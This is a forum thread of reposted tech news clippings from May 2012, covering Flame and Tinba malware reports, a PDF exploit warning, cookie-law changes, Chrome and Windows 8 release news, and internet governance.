Google said that the number of takedown requests has increased dramatically. "The number of requests has been increasing rapidly. These days it's not unusual for us to receive more than 250,000 requests each week, which is more than what copyright owners asked us to remove in all of 2009," it said on its blog.
"In the past month alone, we received about 1.2 million requests made on behalf of more than 1,000 copyright owners to remove search results. These requests targeted some 24,000 different websites."

More at :-
http://www.theinquirer.net/inquirer/news/2179805/m...

--
mogs CClip 134
Expert Contributor 25th May, 2012 19:19
May 25th, 2012, 09:13 GMT · By Ionut Ilascu
CCleaner 3.19 Bypasses UAC on Launch - Adds support for Firefox 13 beta and BitDefender products
One of the most requested features for CCleaner was bypassing the Windows User Account Control (UAC) dialog when launching the application. Piriform listened to the users and managed to achieve this in version 3.19 of its application.

The new option is available in the advanced configuration menu of the program and opens up a wide array of uses, such as scripting the application to work at boot time.

Additional modifications include support for Firefox 13 beta, improved cleaning operation for Firefox Aurora as well as for saved passwords in Google Chrome. Also improved in this release is the detection of scheduled tasks.

Starting this version, CCleaner adds cleaning for BitDefender software and improves detection for Malwarebytes Anti-Malware, VLC Media Player and avast! Antivirus.

CCleaner is available as a portable download from this link.

http://news.softpedia.com/news/CCleaner-3-19-Bypas...

--
mogs CClip 135
Expert Contributor 25th May, 2012 19:28
FBI, Obama Administration Create New Agency to Spy On Your Skype

The DCAC is charged with developing new digital surveillance technologies.

Enabled by the Obama administration, America’s Federal Bureau of Investigation (FBI) is on the brink of rolling out a specialist electronic surveillance unit with the power to spy on Skype conversations and other Internet and wireless communications.

The Domestic Communications Assistance Center (DCAC) is a joint effort between the FBI, U.S. Marshals Service, and Drug Enforcement Agency and is charged with developing the customised hardware necessary for new levels of digital reconnaissance.

Representing the technological nerve centre of the FBI’s “Going Dark” web surveillance drive, the new organisation is being bestowed with a wide-ranging mandate that covers everything from eavesdropping on live online conversations to creating more sophisticated wiretapping devices compatible with electronic devices.

Read more: http://www.itproportal.com/2012/05/25/fbi-obama-ad...

--
mogs CClip 136
Expert Contributor 27th May, 2012 22:54
Opera is Facebook's best browser play
Reports peg No. 5 browser maker as takeover target
By Gregg Keizer
May 27, 2012 03:21 PM ET
Computerworld - Facebook may acquire Norwegian browser maker Opera Software, developer of the Opera and Opera Mini browsers for desktops and mobile phones, according to a report.

The purchase of Opera would give Facebook a way to quickly create a dedicated browser customized for the social networking giant and its estimated 900 million active monthly users.

It would also put Facebook in the middle of a browser battle with Microsoft (Internet Explorer), Mozilla (Firefox), Google (Chrome) and Apple (Safari). Some of those companies -- like Microsoft -- have partnered with Facebook, while others -- such as Google -- compete in the social networking space.

U.K.-based technology website Pocket-lint first reported Friday that Facebook "is looking to buy Opera Software," citing an unnamed source it described only as "trusted." Other sites, including The Next Web, claimed that while their sources could not verify Facebook's interest, they did say Opera's management has been talking to potential suitors.


Read more at :-
http://www.computerworld.com/s/article/9227516/Ope...

--
mogs CClip 137
Expert Contributor 27th May, 2012 23:06
About Qualys BrowserCheck

Qualys BrowserCheck is a cross-platform and cross-browser SaaS service that scans the user's browser looking for vulnerabilities in the browser itself and its plug-ins. This tool will also help you fix the security issues discovered by the scan.

Qualys BrowserCheck Business Edition is a version of BrowserCheck that allows an IT/network admin to create an account in BrowserCheck and to access a view of the browsers and plugins being used in their networks, with detailed data on vulnerabilities on the user level.

The threat of browser-based data breaches is growing. The number of vulnerabilities in browser plugins is on the rise. Now is the time to be proactive about the security of your web browser.

https://browsercheck.qualys.com/?scan_type=js

--
mogs CClip 138
Expert Contributor 28th May, 2012 11:41
Google banned ads rocket to 134m
by Shaun Nichols
Google said that its advertising business was forced to block roughly 134 million malicious and misleading submissions last year.
The company reported that its volume of disapproved advertisements more than doubled between 2010 and 2011, up from 56.4 million blocks in 2010 and just 25.3 million in 2008. Additionally, Google banned some 824,000 advertisers in 2011, up from 248,000 in 2010 and 18,000 in 2008.
Google said that the advertisements were removed for violating the terms and conditions of the Google and AdSense platforms. The terms prohibit ads which are misleading, linked to malware attacks and considered to be spam.
"Bad ads have a disproportionately negative effect on our users; even a single bad ad slipping through our defenses is one too many," Google director of advertising engineering David Baker said in a blog post.
"That’s why we’re constantly working to improve our systems and utilise new techniques to prevent bad ads from appearing on Google and our partner sites."

More at :-
http://www.v3.co.uk/v3-uk/news/2180060/google-bans...

--
mogs CClip 139
Expert Contributor 28th May, 2012 11:56
Thousands of websites in breach of new cookie law

Thousands of UK websites are now in breach of a law that dictates what they can log about visitors.

European laws that define what details sites can record in text files called cookies came into force on 26 May.

Cookies are widely used to customise what repeat visitors see on a site and by advertisers to track users online.

The Information Commissioner's Office (ICO) said it would offer help to non-compliant sites rather than take legal action against them.

Action plan
The regulations say websites must get "informed consent" from users before they record any detailed information in the cookies they store on visitors' computers.

Among websites that have complied with the law, getting consent has involved a pop-up box that explains the changes. Users are then asked to click to consent to having information recorded and told what will happen if they refuse.

UK firms have had 12 months to prepare for the change and the ICO has spent much of that time reminding businesses about their obligations.

More at :-
http://www.bbc.co.uk/news/technology-18206810

--
mogs CClip 140
Expert Contributor 28th May, 2012 21:21
Complex cyberwar tool 'Flame' found ALL OVER Middle East

20 times larger than Stuxnet, two years old... and still active
By Brid-Aine Parnell

Posted in Enterprise Security, 28th May 2012 16:01 GMT
A new super-cyberweapon targeting countries like Iran and Israel that has been knocking around in computers for two years has been discovered by researchers.

"Flame", a highly sophisticated piece of malware, was unearthed by the International Telecommunication Union (ITU) and Kaspersky Lab, which said it was more complex and functional than any cyber threat it had seen to date.

Because Flame is so super-complicated and because of the geography of the attack, Kaspersky Lab's global research and analysis team head Alexander Gostev said he was in "no doubt" that it was a state-sponsored worm.

Flame is a cyber espionage program that steals data such as computer display contents, information about targeted systems, stored files, contact info and even audio conversations. Kaspersky Lab said that the worm's features were different from Duqu and Stuxnet, but it matched up with them when comparing where it attacked, the software vulnerabilities it uses and the fact that only certain computers were targeted.

"Stuxnet and Duqu belonged to a single chain of attacks, which raised cyberwar-related concerns worldwide," Eugene Kaspersky said in a canned statement. "The Flame malware looks to be another phase in this war, and it’s important to understand that such cyber weapons can easily be used against any country. Unlike with conventional warfare, the more developed countries are actually the most vulnerable in this case."

More at :-
http://www.theregister.co.uk/2012/05/28/kaspersky_...

--
mogs CClip 141
Expert Contributor 29th May, 2012 17:45

Chrome to take world's top browser spot for May
In first for Google's browser, StatCounter's data shows Chrome ahead of IE for the month
By Gregg Keizer
May 29, 2012 06:09 AM ET
Computerworld - Google's Chrome is about to grab the top browser spot for a full month for the first time from Microsoft's Internet Explorer, data from a Web analytics company showed.

For the month through Monday, Chrome had an average usage share of 32.5%, slightly higher than Internet Explorer's (IE) 32.1%, according to Irish company StatCounter.

If the remaining three days of May play out as did the previous 28, Chrome will take the browser crown from IE for a full month for the first time since Chrome's September 2008 launch.

Previously, Chrome had edged IE on weekends, and then earlier this month topped Microsoft's combined browser usage share for the week ending May 20. That trend continued in the month's fourth week as Chrome beat IE 32.9% to 31.4% for the seven days ending May 27.
The spread between the two browsers for the fourth week of the month was 67% larger than during the third week, hinting that Chrome continues to gain momentum in the share race.

Other browsers remained steady. Through May 28, Mozilla's Firefox accounted for 25.5% of all browsers used worldwide, while Apple's Safari and Opera Software's Opera logged in at 7.1% and 1.8%, respectively.

More at :-
http://www.computerworld.com/s/article/9227536/Chr...

--
mogs CClip 142
Expert Contributor 29th May, 2012 17:50
Super-powerful Flame worm could take YEARS to dissect
By John Leyden

Posted in Business, 29th May 2012 13:11 GMT


Analysis The exceptionally complex Flame malware, this week found on numerous systems across the Middle East and beyond, is likely to take months if not years to analyse.

Early indications suggest that Flame is a cyber-espionage toolkit that has penetrated computers primarily, but not exclusively, in Iran and Israel. The worm may have been in circulation for at least two years (and perhaps much longer) but only hit the news on Monday following a series of announcements by security groups and antivirus firms.

Iran's National Computer Emergency Response Team published a warning about the data-stealing virus, promising an antidote: so far the malware has completely evaded detection by commercial antivirus scanners. Iranian researchers described the malware as a "close relation" to Stuxnet, the famously well-engineered nasty that sabotaged industrial control systems linked to Iran's controversial nuclear programme.

Kaspersky Lab said the UN International Telecommunication Union had alerted it to Flame and asked for help analysing the malware, which was believed to be wiping information from Middle Eastern computers. Kaspersky said the unusually large virus has been spreading since March 2010.

More at :-
http://www.theregister.co.uk/2012/05/29/flame_cybe...

--
mogs CClip 143
Expert Contributor 29th May, 2012 17:57
F-Secure warns of Olympic themed emails carrying malicious code

After it found an Olympics PDF affecting Adobe Reader and Acrobat

By Lee Bell

Source: The Inquirer (http://s.tt/1cU9s)

FINNISH SECURITY FIRM F-Secure has warned of the dangers of Olympic themed emails that contain links after it encountered a malicious Olympic Games schedule PDF file that affects older versions of Adobe Reader and Acrobat.

F-Secure researcher Sean Sullivan said in a blog post Monday that the malware was found "while mining our back end for documents which drop executables".

Sullivan told The INQUIRER, "Typically, for a PDF exploit what will happen for the person sitting at the computer screen is that Adobe Reader will launch, it will crash and then it will drop a back door infecting the machine, allowing access remotely. It will then launch a clean decoy as part of an attack."

In this case, the decoy is a copy of the London 2012 Olympic schedule circa October 2010.

He added, "The back door installs the software and connects back to home base. It could be someone out there trying to form his own botnet, turn the exploited machine into a zombie, into a bot."

The Olympic Games PDF exploit attempts to make a network connection with a site registered to "student travel" in Baotoushi, China.

Sullivan said the PDF exploits CVE-2010-2883 in the Cooltype.dll file in Adobe Reader and Acrobat version 9.x before 9.4 and 8.x before 8.2.5, on both Windows and Mac OS X operating systems.

Sullivan said if you don't already have the current version of Adobe Reader, you really should go get it now.

Last month, F-Secure's chief security researcher Mikko Hypponen warned that we are entering into a cyber warfare revolution, and that governments will soon attempt to outdo each other based on their computer weapons' prowess.

http://www.theinquirer.net/inquirer/news/2180482/-...

--
mogs CClip 144
Expert Contributor 29th May, 2012 21:04

Consumer Reports: Free anti-malware software for Windows, Mac is effective
By Ellen Messmer | Network World US | 29 May 12

In what could be regarded as a controversial test of anti-malware effectiveness, the influential Consumer Reports publication in its June issue gives its main recommendation to anti-malware freeware for protecting Windows and Mac computers. With some caveats, Consumer Reports says in its "Security Software" article it regards it as unnecessary to buy commercial anti-malware software.

Consumer Reports says it carried out the testing of 18 separate anti-malware software applications -- four of them free and 14 paid -- in conjunction with International Consumer Research & Testing based on how well the software defended against live exploits from websites.

It combined these results with other tests related to "ease of use," as well as a measurement of how the software used memory or other "resources" that might slow computer operation during a scan. The testing also looked at "scan speed" related to how fast large groups of files could be scanned, and "updating" to see how fast each software package would be updated against new malware. Other categories such as "information help," related to how clear and useful instructions are, and "clear warnings" were examined. The effectiveness of any "firewall performance," "spam filter," "parental filter" and "non-boot rescue" were also technically reviewed by Consumer Reports and its testing partner.

In the June issue, Consumer Reports recommends that consumers use free anti-malware tools -- the top choice being Avira Free Antivirus, followed by AVG Anti-Virus Free 2012, Avast Free Antivirus and Microsoft Security Essentials, unless the user should be considered among the "most at-risk Internet users."

Read more: http://www.pcadvisor.co.uk/news/security/3360766/c...

--
mogs CClip 145
Expert Contributor 29th May, 2012 21:10
Microsoft forbids class actions in new Windows licence

You're on your own now
By Gavin Clarke

Posted in Business, 29th May 2012 18:01 GMT
Microsoft will make it harder for customers to club together with lawyers to file lawsuits against its products.

The company is rolling out new End User License Agreements (EULAs) that forbid punters from joining class-action proceedings.

Assistant general counsel Tim Fielden announced the tweak here and said the changes will come into effect as Microsoft releases major hardware or software updates.

The first big product to include the altered licence will be Windows 8: a release candidate is expected in June before it ships for PCs and tablets in late summer or the autumn.

Read more at :-
http://www.theregister.co.uk/2012/05/29/no_microso...

--
mogs CClip 146
Expert Contributor 29th May, 2012 23:29
Stable Channel Update for Chromebooks
Tuesday, May 29, 2012 | 12:21
The Google Chrome team is happy to announce the arrival of Chrome 19 to the Stable Channel for ChromeOS. More detailed updates are available on the Google Blog.

The Stable channel has been updated to 19.0.1084.52 (Platform version: 2046.107.0) for Chromebooks (Acer AC700, Samsung Series 5, Samsung Chromebook Series 5 550, and Samsung Chromebox Series 3). Machines will be receiving updates to this version over the next several days.

This build contains a number of new features, as well as security & stability improvements.

Some highlights of these changes are:
Entirely redesigned UI and updated Window Manager (Learn more).
New modes for multiple monitor handling: mirrored (highest common resolution only), show only on primary, show only on secondary (Switch with Ctrl + F5)
New open source trackpad stack
Updated Scratchpad app
New file types supported (Learn more)
Functional and visual refresh of the Chrome OS Settings
Recovery tool supports re-formatting recovery media (use a previous recovery image USB)
Introduced new Japanese fonts (Motoya G04 Gothic/Mincho).

If you find new issues, please let us know by visiting our help site or filing a bug. Interested in switching channels? Find out how. You can submit feedback using ‘Report an issue’ under the wrench menu.

Orit Mazor
Google Chrome

--
mogs CClip 147
Expert Contributor 30th May, 2012 20:52
1 in 5 U.S. Windows PCs lack antivirus defenses
Expired trial software accounts for more than a third of the 19.3% of American computers that browse naked

By Gregg Keizer
May 30, 2012 12:48 PM ET
Computerworld - Nearly a fifth of Windows PCs in the U.S. lack any active security protection, an antivirus vendor said today, citing numbers from a year-long project.

"The scale of this is unprecedented," argued Gary Davis, the director of global consumer product marketing for McAfee, talking about the scope of his company's sampling of PC security.

McAfee took measurements from scans of more than 280 million PCs over the last 12 months, and found that 19.3% of all U.S. Windows computers browsed the Web sans security software. Owners of those systems downloaded and used McAfee's free Security Scan Plus, a tool that checks for antivirus programs and enabled firewalls.

Globally, the average rate was 17%, putting the U.S. in the top 5 most-unprotected countries of the 24 represented in the scans.

More at :-
http://www.computerworld.com/s/article/9227570/1_i...

--
mogs CClip 148
Expert Contributor 30th May, 2012 20:58
Windows 8 Release Preview leaks to Web
Appearance of Chinese 64-bit build may signal milestone release this week

By Gregg Keizer
May 30, 2012 06:39 AM ET
Computerworld - A Chinese edition of Windows 8, reportedly the same build that Microsoft will launch in the next week as the Release Preview, has leaked to file-sharing sites.

On Tuesday, links to Build 8400 of Windows 8 appeared on multiple sites and discussion forums, many of them Chinese-language destinations.

According to multiple reports on the Web, Build 8400 is legitimate and has successfully been installed by some users. "Canouna," the nickname used by an administrator of the WinLeaked forum, vouched for the download.

"100% LEGIT," Canouna tweeted early Tuesday.

Others, however, called the leak "a wild goose chase" because one widely shared link pointed to a corrupted file.

The only edition available Tuesday was the 64-bit version for Chinese users.

Microsoft has not disclosed the debut date of Windows 8 Release Preview -- the name for what the company has called "release candidate" in the past -- but has promised it would make the final public milestone available the first week of June.

More at :-
http://www.computerworld.com/s/article/9227565/Win...

--
mogs CClip 149
Expert Contributor 30th May, 2012 21:01
Dev Channel Update
Tuesday, May 29, 2012 | 18:07
Labels: Dev updates
The Dev channel has been updated to 21.0.1155.2 for Windows, Mac, Linux, and Chrome Frame. This build contains the following updates:

Updated V8 - 3.11.6.2
Gamepad API prototype http://www.w3.org/TR/gamepad/ available by default.
TLS 1.1 is enabled by default.
Mouse Lock (Pointer Lock) no longer requires fullscreen. [r138150][r138944] Native Client applications can use this now, while the JavaScript API still requires enabling in about:flags. Try e.g. http://media.tojicode.com/q3bsp/

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 150
Expert Contributor 30th May, 2012 21:09
Kaspersky warns of worldwide implications of evolving Flame malware

Despite F-Secure saying it's not a concern for countries outside Iran
By Lee Bell
Tue May 29 2012, 18:23
SECURITY VENDOR Kaspersky has warned that the world is not safe from malware like Flame, despite rival security firm F-Secure having said that it's "not a concern" for countries other than Iran.
The comments highlight how the security industry has conflicting opinions on the complex cyber espionage spyware that has targeted Iranian IT systems.
F-Secure researcher Sean Sullivan told The INQUIRER today that Flame is a "limited string, a special edition malware tool that doesn't get spotted in the wild, so if it was to spread... our automation would have picked it up". For this reason, he said, "It's not a concern for UK lands for certain."
However, Kaspersky's chief security expert told The INQUIRER that it's too early to say whether we are safe from the Flame cyber weapon even if it does appear to have been successfully stopped, because a new version could well evolve in the future.
"Flame has a model structure. This means once infected the operators can install additional models. So far we've found 20 different models but there may still be more yet to discover," he said.
"I think the people behind Flame spend every year deploying a new model. It's a huge operation with dozens of people involved - the same level as Stuxnet. I think such a successful cyber operation will create a new version."
Today it was also hinted by Israel's vice prime minister Moshe Ya'alon that it might have been involved in the Flame attack against Iran, according to reports.

Read more at :-
http://www.theinquirer.net/inquirer/news/2180718/k...

--
mogs CClip 151
Expert Contributor 30th May, 2012 21:15
Trojan poses as privacy tool, spies on Iranian surfers

Looks like a popular free encrypted proxy tool
By John Leyden

Posted in Malware, 30th May 2012 13:24 GMT
Backdoored versions of a widely used privacy tool have surfaced in Iran, raising fears that its government is using the Trojanised software to spy on its citizens.

A free encrypted proxy tool called Simurgh – official website https://simurghesabz.net – is used by many Iranians to circumvent locally applied net censorship technologies. Recently a Trojanised version of the tool (Simurgh-setup.zip) has begun appearing on file-sharing networks and wares sites.

The real software works as a standalone tool that can be run off a USB stick at locations such as cybercafes and other public internet access points. By contrast, the Trojanised version requires installation on a client PC. Thereafter, the software tracks user activities including keystrokes and websites visited. This data is then uploaded to US-based servers registered to a Saudi Arabian organisation, human rights activist group CitizenLab.org says.

More at :-
http://www.theregister.co.uk/2012/05/30/trojaned_p...

--
mogs CClip 152
Expert Contributor 30th May, 2012 21:21

May 30th, 2012, 14:47 GMT · By Ionut Arghire
Microsoft Offers Skype for OEMs to Preinstall on PCs

Ever since Microsoft acquired Skype, people have been wondering how the communication service and application would fit the company’s portfolio.

The Redmond-based software giant was mum so far on its plans to integrate the service with its other products, yet some info on the matter has already emerged.

Earlier this week, the company announced to its OEM partners the availability of Skype for integration with their computers.

“Enhance your Windows 7 installations with Skype,” Microsoft’s Steven Bink notes in a blog post announcing the availability of a Skype OPK.

The new Skype OPK arrives with capabilities similar to those packed inside any other OEM Preinstallation Kit (such as those available for Windows and Office).

It packs a wide range of technical info to offer OEMs the possibility to integrate it with their PCs in a multitude of scenarios.

The new OPK was released with all the tools and details required for deploying Skype 5.8. It comes with the installer application, as well as with instructions on what OEMs need to do to silently install it for their users.

Through including Skype in their PCs, OEMs ensure that customers benefit from a load of communication capabilities, including text, voice, video and the like.

With Skype preinstalled, users will take advantage of all the features already available through the standalone application and service:

Skype-to-Skype calls. Talk to anyone else on Skype, anywhere in the world, for free.
Video calling on Skype. Talk face to face with live video for free.
Instant messaging. Send an instant message to anyone on Skype, for free.
Call phones and mobiles. Call mobile phones or landlines anywhere in the world with Skype Credit—or save even more with a subscription.
Group video calling. Share, celebrate, and collaborate from anywhere in the world. There’s so much they can do together over group video.
Screen sharing. Share their screens with anyone on Skype for free, or share with a group of friends or colleagues using Skype Premium.

The Skype 5.8 OPK.img weighs 18MB and can be downloaded from Microsoft’s dedicated website for OEMs (registration required).

Microsoft is expected to make Skype available on more of its platforms as an integrated experience, including Xbox and Windows Phone. Windows 8 might also feature integration with the service, yet Microsoft hasn't confirmed it as of now.

http://news.softpedia.com/news/Microsoft-Offers-Sk...

--
mogs CClip 153
Expert Contributor 30th May, 2012 22:45
Proposed new Internet neighborhoods unveiled June 13

May 30, 2012 by Glenn Chapman
The agency in charge of website addresses has picked June 13 as the day it will reveal proposed new names for online neighborhoods breaking the ".com" mold.

The Internet Corporation for Assigned Names and Numbers (ICANN) said in an online post that it will stop taking applications for Generic Top Level Domains at the end of Wednesday in the GMT time zone and reveal the requests in June.

In January, ICANN began taking applications from those interested in operating Internet domains that replace endings such as .com or .org with nearly any acceptable words, including company, organization or city names.

Outgoing ICANN president Rod Beckstrom has championed the change as a "new domain name system revolution."

The new system will allow Internet names such as .Apple or .IMF or .Paris.

ICANN says the huge expansion of the Internet, with two billion users around the world, half of them in Asia, requires the new names.

Registration costs $185,000 with a $25,000 annual fee after that.

ICANN has taken in more than $352 million in application fees, according to Beckstrom. There are more than 2,000 applications in ICANN's system.

"It is going to be very interesting on reveal day," Beckstrom said.

Read more at :-
http://phys.org/news/2012-05-internet-neighborhood...

--
mogs CClip 154
Expert Contributor 31st May, 2012 09:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Wednesday, May 30, 2012 | 16:41
Labels: Beta updates

The Beta channel has been updated to 20.0.1132.21 for Windows, Mac, Linux, and Chrome Frame. This build contains updates to v8 (3.10.8.11) and fixes for bugs and stability. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 155
Expert Contributor 31st May, 2012 18:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
May 31st, 2012, 13:40 GMT · By Eduard Kovacs
Researchers Present Tinba, 20KB Trojan Banker

CSIS Security Group have discovered Tinba, what they believe to be “the world’s smallest Trojan-banker.” The malicious element belongs to a new malware family and it’s designed to steal sensitive information by attaching itself to the web browser and intercepting network traffic.

Before we explain how the 20 kilobyte Trojan works, we would like to refer to a clever observation made by F-Secure’s Chief Research Officer Mikko Hypponen regarding the size of Tinba compared to the one of Flame, the recently uncovered brother of Stuxnet and Duqu.

“To put Flame's size of 20MB into perspective, here's a full-blown banking trojan in 20kB. Flame is 1024 times larger,” he wrote on Twitter.

That being said, let’s take a look at what the Tiny Banker, also known as Zusy, can actually do and how it operates.

Similar to other banking Trojans, Tinba also utilizes webinjects and Man-in-the-Browser attacks in order to trick the potential victim into handing over transaction authentication numbers (TAN), two-factor authentication codes, and other valuable details.

When executed, it uses an obfuscated injection routine that allows it to avoid being detected by security solutions. After that, it creates a new process called Version Reporter Applet (winvert.exe), which is located in the System folder.

However, that’s not the only process leveraged by Tinba. It also injects itself into processes such as svchost and explorer.

There are 4 hardcoded domains used by the malware for communicating with its command and control servers. This allows it to continue operating even if one of the domains fails to respond.

In order to compromise the web browsers, the Trojan injects itself into processes like firefox.exe and iexplorer.exe, allowing it to manipulate network traffic through the web browser’s APIs.

“An interesting observation is the fact that Tinba will modify headers X-FRAME-Options thus being able to inject insecure non HTTPS supported elements from external servers/websites. Tinba, like its equals, targets financial websites, but only a very small list of specific URLs,” Peter Kruse, partner and security specialist at CSIS explained.

Finally, the expert also shares the same beliefs as Mikko Hypponen, stating that a piece of malware doesn’t necessarily have to be 20 megabytes in size to be effective.

http://news.softpedia.com/news/Researchers-Present...

--
mogs CClip 156
Expert Contributor 31st May, 2012 18:25
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft to ship Windows 8 Release Preview today
Goof leaks word of final public milestone's early launch

By Gregg Keizer
Computerworld - Microsoft will ship Windows 8 Release Preview today, several days earlier than expected, according to a blog briefly posted by the company.

The blog post, written by Chuck Chan, an executive with the Windows development team, went live for a few minutes late Wednesday, long enough for several users to take notice. Neowin first reported the leak of Chan's post and its Thursday date.

Earlier, Microsoft had promised to deliver the Release Preview the first week of June, a timeframe that most, including Computerworld, assumed meant the week of June 4-8. But the company must have thought differently, figuring that Friday, June 1, qualified this week as the month's first.

The late-May debut of Release Preview meshes with a schedule spelled out in March by Michael Cherry, an analyst with Directions on Microsoft, who said that the Redmond, Wash. developer would deliver the build three months after the Consumer Preview, with a "release to manufacturing," or RTM, edition three months later.

More at :-
http://www.computerworld.com/s/article/9227597/Mic...

--
mogs CClip 157
Expert Contributor 31st May, 2012 18:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 31st May, 2012 18:32
Complaints over new cookie laws close to 100 following last minute amendments.
Complaints are already heading the way of the Information Commissioner's Office (ICO) regarding the EU's new continent-wide cookie laws, which came into force at the beginning of the week.
To date, 84 people have contacted the organisation, which is the UK's independent authority on data protection and information rights, to protest the new regulations, though the tone of the objections registered is not clear.
It seems most likely that people are upset specifically with the ICO for making last-minute alterations to the legislation enabling companies to assume some website users have given consent to have their details stored.
Some observers have argued that this loophole essentially negates the point of a cookie law in the first place, though it is also possible that Internet surfers are annoyed by the extra pop-ups coming their way as a result of the new requirements.
On 28 May, the rules governing how cookies employed for data capture purposes are flagged by containing websites were altered to reflect ongoing concerns about electronic invasions of privacy.
Companies who use the controversial but widespread technique of obtaining personal information and tracking online behaviour patterns on their sites are now required to inform web users of the practice and receive their consent.
An ICO spokesperson has indicated that the organisation has set up a survey on its website to encourage people to share their feelings about how cookies are managed in the digital world.
Read more: http://www.itproportal.com/2012/05/31/complaints-o...

--
mogs CClip 158
Expert Contributor 31st May, 2012 21:59
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 1st Jun, 2012 23:32
US rejects proposal to put Internet under UN control

The world is displayed on a computer screen via Google Earth. US officials, lawmakers and technology leaders offered a resounding "no" Thursday to proposals to bring the Internet under United Nations' control and said they would lead efforts to stop the move.

US officials, lawmakers and technology leaders voiced firm opposition Thursday to efforts to bring the Internet under UN control, saying it could hurt free expression and commerce.

At a congressional hearing, the comments were united in opposition to placing the Internet under the jurisdiction of the International Telecommunications Union, a United Nations agency which governs telecom systems.

"There's a strong, bipartisan consensus within the (US) administration and Congress that we must resist efforts from some countries to impose a top-down governance of the Internet," Representative Henry Waxman told the hearing.

Congresswoman Doris Matsui added that "any international authority over the Internet is troublesome, particularly if that effort is being led by countries where censorship is the norm."

A top State Department official, in prepared remarks, reaffirmed the opposition of the Obama administration to UN governance of the Internet.

"In all bilateral encounters and multilateral meetings, the United States consistently opposes the extension of intergovernmental controls over the Internet," said Philip Verveer, deputy assistant secretary of state and coordinator for IT policy, saying this would lead to "very bad outcomes."

"It inevitably would diminish the dynamism of the Internet," he said.

Verveer told lawmakers that UN control would possibly "aid in censorship and repression" in some countries.

The comments come ahead of a meeting in December of the ITU where some nations will be pressing for the agency to formally govern the Internet.

Some nations, including Russia and China, say the Internet is still controlled by the United States and that a UN effort would give a greater voice to the developing world.

More at :-
http://phys.org/news/2012-05-internet.html

This thread is now closed... thank you for your support.

--

© 2002-2014 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144